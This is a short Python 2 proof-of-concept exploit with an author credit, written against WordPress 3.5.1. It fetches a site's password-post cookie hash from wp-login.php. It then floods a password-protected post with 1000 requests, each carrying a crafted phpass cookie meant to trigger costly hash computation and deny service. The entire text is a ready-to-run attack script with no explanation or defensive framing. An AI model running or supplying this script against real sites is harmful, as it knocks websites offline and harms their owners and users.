# Proof of Concept # WordPress 3.5.1 # Denial of Service # Author: vnd at vndh.net import httplib import re def get_cookie_hash(hostname, wplogin): headers = {'Content-type': 'application/x-www-form-urlencoded'} handler = httplib.HTTPConnection(hostname) handler.request('POST', wplogin, 'action=postpass&post_password=none', headers=headers) response = handler.getresponse() set_cookie = response.getheader('set-cookie') if set_cookie is None: raise RuntimeError('cannot fetch set-cookie header') pattern = re.compile('wp-postpass_([0-9a-f]{32})') result = pattern.search(set_cookie) if result is None: raise RuntimeError('cannot fetch cookie hash') return result.groups()[0] def send_request(hostname, post, cookie_name): headers = {'Cookie': 'wp-postpass_%s=%%24P%%24Spaddding' % cookie_name} handler = httplib.HTTPConnection(hostname) handler.request('GET', post, 'action=postpass&post_password=asdf', headers=headers) if __name__ == '__main__': hostname = 'wordpress.remote' wplogin = '/wp-login.php' posturl = '/?p=4' # link to password protected post requests = 1000 cookie_hash = get_cookie_hash(hostname, wplogin) print '[+] received cookie hash: %s' % cookie_hash for i in xrange(requests): print '[+] sending request %d...' % (i + 1) send_request(hostname, posturl, cookie_hash)